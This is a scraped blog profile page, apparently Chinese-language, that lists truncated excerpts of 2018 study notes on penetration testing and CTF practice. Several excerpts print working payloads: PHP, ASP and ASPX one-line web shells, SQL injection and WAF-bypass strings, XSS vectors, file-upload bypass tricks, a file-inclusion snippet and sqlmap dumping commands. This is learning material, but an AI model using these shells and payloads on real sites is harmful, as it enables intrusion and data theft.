2 xaiver phong

尚未进行身份认证

我要认证

暂无相关简介

等级
TA的排名 23w+

access trunk

Access端口在收到一个报文后,先判断该报文中是否有VLAN标记信息:如果没有VLAN标记,则打上该Access端口的PVID后继续转发;如果有VLAN标记则默认直接丢弃。Access端口上发送报文时,会先将报文中的VLAN信息去掉,然后再直接发送,所以Access端口发出去的报文都是不带VLAN标记的。------access端口只收没有标记的帧,有标记就会丢弃。没有标记就打上标记从ac...

2018-10-20 08:59:39

运行常用命令

命令 此电脑 explorer控制面板 control本地安全策略 secpol.msc组策略 gpedit.msc注册表 regedit开机启动 msconfig本地用户和组 lusrmgr.msc事件查看器 eventvwr查看共享fsmgmt.msc计算机管理 compmgmt.msc磁盘管理 diskmgmt.msc服务管理services.msc防火墙 fire...

2018-10-08 20:47:51

反序列化漏洞

Weblogic反序列化漏洞Java 提供了一种对象序列化的机制,该机制中,一个对象可以被表示为一个字节序列,该字节序列包括该对象的数据、有关对象的类型的信息和存储在对象中数据的类型。将序列化对象写入文件之后,可以从文件中读取出来,并且对它进行反序列化,也就是说,对象的类型信息、对象的数据,还有对象中的数据类型可以用来在内存中新建对象。整个过程都是 Java 虚拟机(JVM)独立的,也就是说...

2018-10-08 18:56:10

服务器中间件等端口

2018-10-07 14:09:31

常见解析漏洞与修复

IISiis7.5解析漏洞解析文件类型 IIS6.0默认的可执行文件除了asp,还包含以下三种: *.asa *.cer *.cdxIIS在解析文件时,主要有三个解析漏洞:目录解析文件解析解析文件类型目录解析:原理:当在网站下建立*.asp、*asa格式文件夹的时候,其目录下的任意文件都将被IIS当做asp文件来解析并执行。利用:例如创建目录 woo...

2018-10-07 14:05:56

burpsuite密码爆破

用bugku的题做例子爆破开代理抓包拦截发送到intruder进入intruder,点击position,先清空一下,再在需要爆破的密码上add下点击payloads,加入自带的字典密码passwords开始爆破等待一段时间后,如果字典里有就会看到其中的length长度和其他的不同,就是所需要的进入bugku,输入hack就有flag了...

2018-10-03 21:02:47

布尔盲注

布尔盲注一般是在网页没有报错,回显的时候使用。只能对url输入的判断一个对错,一般一次只能判断一个英文字符基于布尔的盲注(Boolean-based blind SQL injection),即可以根据返回页面判断条件真假的注入。比如对参数加一个’ and ‘1’=‘1和’ and ‘1’='2,如果第一个能查询出来,第二个不行,则说明可以注入,后面可以根据字段and exist(…)不断猜测...

2018-10-03 15:16:20

操作系统、数据库的默认密码

Window:计算机管理员administrator的默认密码是空的Linux:最高权限root,密码toorarch Linux :用户root,密码blackrchSql server:默认登录名是sa,对应数据库用户是dbo,密码空Mysql:用户root,密码空Oracle: system默认:managersys默认:change_on_install,密码必须加上as sy...

2018-10-02 15:37:31

文件上传绕过

黑名单绕过:第一种:大小写绕过:打开上传界面,弹出“不能上传php文件”的提示,猜测是通过客户端黑名单来限制上传文件的类型。修改文件扩展名为.PhP,利用大小写绕过第二种:修改为*.php3 php5 php.abc第三种:先上传一个带有一句话木马的文件,再上传一个解析的文件`<FilesMatch "abc.jpg">` //匹配名称中带有abc.jpg的文件`Set...

2018-10-01 22:06:03

一句话木马转化为图片格式

php<?php @eval($_POST[a]);?><?php echo shell_exec($_GET['cmd']);?>Asp<%eval request(“123”)%>Aspx<%@ Page Language=”Jscript” %><%eval(Request.Item[“123”],”unsafe”);%&...

2018-10-01 21:50:36

php入门

php:PHP(Hypertext Preprocessor):超⽂本预处理器PHP与HTML的关系:PHP的作⽤是根据浏览器的请求,⽣成响应内容(HTML),反馈给浏览器PHP的优点:简单,快速,跨平台,免费应用:web动态网页开发app接口开发:iOS,安卓基础变量:$加字⺟、数字或者下划线 $a $my_name $a1⼩驼峰法: $myName⼤驼峰法: $MyNa...

2018-10-01 15:27:00

sqlmap爆库

判断是否存在注入点-u “url” --batch获取全部数据库-u “url” --dbs --batch获取当前数据库-u “url” --current-db --batch获取当前数据库里所有表-u “url” -D wavsepDB --tables --batch获取表的字段-u “url” -D wavsepDB -T users --col...

2018-10-01 15:15:08

sql注入绕waf法

大小写混合union SelEct多重关键字Ununionion selselectect编码类型:十六进制、URL、Unicode形式:0x626264218e、%20、%u0020注释–#等价函数或命令union:用于合并两个或多个 SELECT 语句的结果集,并消去表中任何重复行。union distinct:同unionunion all:用于合并两个或多个 ...

2018-10-01 15:12:05

报错注入

报错注入一般流程报错注入的五种函数全部都以查user()为例子~floor()id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)extractvalue()id = 1 and ...

2018-10-01 15:06:07

xss绕过

1. 利用html标签的属性值利用场景:标签支持JavaScript:code伪协议对应防御:过滤JavaScript关键字<iframe src=javascript:alert(1)><a href=javascript:alert(1)> 文本</a>" ><svg x="" Onclick=alert(1)>注释:#...

2018-09-29 21:04:50

本地文件包含漏洞

本地文件包含漏洞上传图片,包含图片GetShell例1index.php<?phpif ($_GET[page]) {include($_GET[page]);} else {include "show.php";}图片:1.jpg<? phpphpinfo();?>127.0.0.1/index.php/?page=uploads/1.jpg 上传图.

2018-09-26 09:00:18

Google hack语法

谷歌网页搜索技术,大部分在百度等搜索引擎中也适用。同样,这些搜索技术是来源于传统数据库检索技术,因而,对这部分的学习,能为后续章节的数据库检索奠定基础,并能获得直观的认识。本部分结合应用实例的讲解也能让我们加深信息检索对解决实际问题、提高搜索效率的认知。hack语法1.默认模糊查找示例:kali linux 渗透测试2.短语精确查找""示例:“kali linux 渗透测试”3.通配符...

2018-09-25 14:42:04
勋章 我的勋章
    暂无奖章